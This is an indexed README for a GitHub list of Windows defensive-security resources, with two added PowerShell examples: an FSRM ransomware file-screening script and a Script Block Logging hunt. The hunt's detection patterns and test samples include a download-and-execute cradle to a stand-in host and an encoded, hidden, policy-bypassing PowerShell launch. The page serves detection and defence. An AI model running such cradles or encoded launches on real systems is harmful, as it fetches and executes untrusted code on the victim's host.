Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mhaggis/hunt-detect-prevent
Lists of sources and utilities utilized to hunt, detect and prevent evildoers.
- Host: GitHub
- URL: https://github.com/mhaggis/hunt-detect-prevent
- Owner: MHaggis
- License: gpl-3.0
- Created: 2017-01-11T07:13:13.000Z (almost 8 years ago)
- Default Branch: master
- Last Pushed: 2018-12-10T15:57:21.000Z (about 6 years ago)
- Last Synced: 2024-10-28T21:37:20.393Z (about 2 months ago)
- Topics: hunt, microsoft, powershell
- Language: PowerShell
- Size: 2 MB
- Stars: 161
- Watchers: 23
- Forks: 41
- Open Issues: 2
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# hunt-detect-prevent
Lists of sources and utilities to hunt, detect and prevent evildoers.
# Hunt, Detect & Prevent -- Resources
**AD Security**
https://jimshaver.net/2016/02/14/defending-against-mimikatz/
https://adsecurity.org/?p=559
**Microsoft EMET**
https://support.microsoft.com/en-us/kb/2458544
**Microsoft ATA**
https://blogs.technet.microsoft.com/enterprisemobility/2016/12/12/will-advanced-threat-analytics-help-me-with-non-windows-oss/
**Microsoft File Screening**
http://olivermarshall.net/using-file-screening-to-help-block-cryptolocker/
http://blog.netwrix.com/2016/04/11/ransomware-protection-using-fsrm-and-powershell/
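Added example, not code from the hunt-detect-prevent repository or from the two posts linked above: a PowerShell script that applies the FSRM file-screening technique those posts describe, blocking known ransomware artefacts on a share and logging an event for the SIEM when one is written. It assumes Windows Server with the FS-Resource-Manager feature installed; the share path, group name and extension list are placeholders chosen for illustration.

```powershell
# Added example (not from the hunt-detect-prevent repo). Requires the FSRM role:
#   Install-WindowsFeature FS-Resource-Manager -IncludeManagementTools
Import-Module FileServerResourceManager

$SharePath = 'D:\Shares\Finance'          # assumed share to protect
$GroupName = 'Ransomware Indicators'      # assumed file-group name

# Filenames/extensions dropped by ransomware families; maintain this from a current feed.
# The list below is a constructed sample, not a complete or authoritative set.
$Patterns = @(
    '*.locky', '*.zepto', '*.cerber', '*.crypt',
    '_Locky_recover_instructions.txt', '*_HOWDO_text.html', 'DECRYPT_INSTRUCTION.*'
)

# Create or update the file group so re-running the script is idempotent.
if (Get-FsrmFileGroup -Name $GroupName -ErrorAction SilentlyContinue) {
    Set-FsrmFileGroup -Name $GroupName -IncludePattern $Patterns | Out-Null
} else {
    New-FsrmFileGroup -Name $GroupName -IncludePattern $Patterns | Out-Null
}

# Notification action: write a Warning to the Application log. [Source Io Owner],
# [Source File Path] and [Server] are FSRM's own substitution variables, so the event
# names the account that wrote the file and is picked up by WEF/SIEM collection.
$logAction = New-FsrmAction -Type Event -EventType Warning `
    -Body 'FSRM blocked [Source Io Owner] writing [Source File Path] on [Server]'

# -Active makes the screen block the write. Deploy with -Active:$false first to run in
# passive (monitor-only) mode and confirm the pattern list does not hit legitimate files.
New-FsrmFileScreen -Path $SharePath -IncludeGroup $GroupName -Notification $logAction `
    -Active -Description 'Block ransomware indicator files' | Out-Null

# Show the resulting screen for verification.
Get-FsrmFileScreen -Path $SharePath | Select-Object Path, Active, IncludeGroup
```

File screening matches on name only, so it catches families that use a fixed extension or drop a known ransom note, not content encryption in place or families that randomise names; treat it as one cheap layer next to the logging and EDR resources listed below, not as a substitute for them.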
**Threat Hunting**
https://github.com/ThreatHuntingProject/ThreatHunting
**PowerShell**
Log hunting with PowerShell
http://909research.com/windows-log-hunting-with-powershell/
https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf
https://isc.sans.edu/diary/21829
- PowerShell blocked via Windows Firewall (same for cscript/wscript)
- POSH to read event logs
- http://www.tinyurl.com/504extra2
- https://files.sans.org/summit/DFIR_Summit_Prague_2016/PDFs/PowerShell-obFUsk8tion-Techniques-David-Bohannon.pdf
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
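Added example, not code from the hunt-detect-prevent repository or from the linked articles, showing the "POSH to read event logs" idea in practice: a PowerShell hunt over Script Block Logging events (Microsoft-Windows-PowerShell/Operational, Event ID 4104) for encoded commands, download cradles and the obfuscation styles covered in the Bohannon slides. It assumes Script Block Logging is enabled on the host; the regexes are an illustrative starting set, and the sample events at the bottom are constructed objects shaped like Get-WinEvent output so the script runs offline.

```powershell
# Added example (not from the hunt-detect-prevent repo).

function Test-SuspiciousScriptBlock {
    # Returns the names of every indicator that matches the script block text.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptBlockText)

    # Illustrative indicators, an assumption of this example rather than a complete set.
    $indicators = [ordered]@{
        EncodedCommand   = '(?i)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
        DownloadCradle   = '(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|BitsTransfer)'
        InvokeExpression = '(?i)(\bIEX\b|Invoke-Expression)'
        BypassSwitches   = '(?i)-(nop\b|noprofile|w(indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)'
        BacktickObfusc   = '[A-Za-z]`[A-Za-z]'                  # I`EX, Dow`nloadString
        CharCodeConcat   = '(?i)\[char\]\s*\d+\s*\+\s*\[char\]'  # [char]73+[char]69...
        FormatOperator   = '\{\d+\}.*-f\s*[''"]'                # ("{1}{0}" -f 'oke','Inv')
    }
    foreach ($name in $indicators.Keys) {
        if ($ScriptBlockText -match $indicators[$name]) { $name }
    }
}

function Get-SuspiciousPowerShellEvents {
    # Takes 4104 events from Get-WinEvent (or look-alike objects) on the pipeline and
    # emits one record per event that trips at least one indicator.
    param([Parameter(Mandatory, ValueFromPipeline)]$WinEvent)
    process {
        if ($WinEvent.Id -ne 4104) { return }
        # For 4104, Properties[2] is ScriptBlockText and Properties[3] is ScriptBlockId.
        $text = [string]$WinEvent.Properties[2].Value
        $hits = @(Test-SuspiciousScriptBlock -ScriptBlockText $text)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                TimeCreated   = $WinEvent.TimeCreated
                Computer      = $WinEvent.MachineName
                ScriptBlockId = $WinEvent.Properties[3].Value
                Indicators    = ($hits -join ',')
                Snippet       = $text.Substring(0, [Math]::Min(80, $text.Length))
            }
        }
    }
}

# Constructed sample events standing in for Get-WinEvent output (offline demo only).
function New-SampleEvent([string]$Text, [string]$Id) {
    [pscustomobject]@{
        Id          = 4104
        TimeCreated = Get-Date
        MachineName = 'WKS01'
        Properties  = @(
            [pscustomobject]@{ Value = 1 },
            [pscustomobject]@{ Value = 1 },
            [pscustomobject]@{ Value = $Text },
            [pscustomobject]@{ Value = $Id }
        )
    }
}
$samples = @(
    New-SampleEvent -Text 'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB' -Id 'benign-1'
    New-SampleEvent -Text 'powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' -Id 'enc-1'
    New-SampleEvent -Text 'I`EX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a'')' -Id 'cradle-1'
)

# Only the two malicious samples are reported; the first is silent.
$samples | Get-SuspiciousPowerShellEvents | Format-Table -AutoSize

# Against a live host (administrator rights and Script Block Logging required):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 5000 |
#     Get-SuspiciousPowerShellEvents
```

Script Block Logging records the de-obfuscated block at execution time, so a regex hunt like this sees `I`EX` and `-f` tricks before PowerShell resolves them; pair it with the 4688 process-creation logs with command-line auditing enabled, since `-enc` payloads launched from another process show up there first.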
**Windows event forwarding**
https://blogs.technet.microsoft.com/russellt/2017/05/09/project-sauron-introduction/
https://blogs.technet.microsoft.com/jepayne/2015/11/23/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem/
http://909research.com/sysmon-the-best-free-windows-monitoring-tool-you-arent-using/
https://blogs.technet.microsoft.com/wincat/2008/08/11/quick-and-dirty-large-scale-eventing-for-windows/
**EDR**
CarbonBlack
limacharlie
OSQuery
**Logging**
Logging debrief:
https://www.malwarearchaeology.com/logging/
[ELK](https://www.elastic.co/products)
[Graylog](https://www.graylog.org/)
[Splunk](https://www.splunk.com/)
[alienvault](https://www.alienvault.com/)
**SCCM**
https://www.fireeye.com/blog/threat-research/2016/12/do_you_see_what_icc.html
https://github.com/PowerShellMafia/PowerSCCM
**Recommended reading:**
https://github.com/subTee
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
http://seclist.us/powermemory-v1-4-exploit-the-credentials-present-in-files-and-memory.html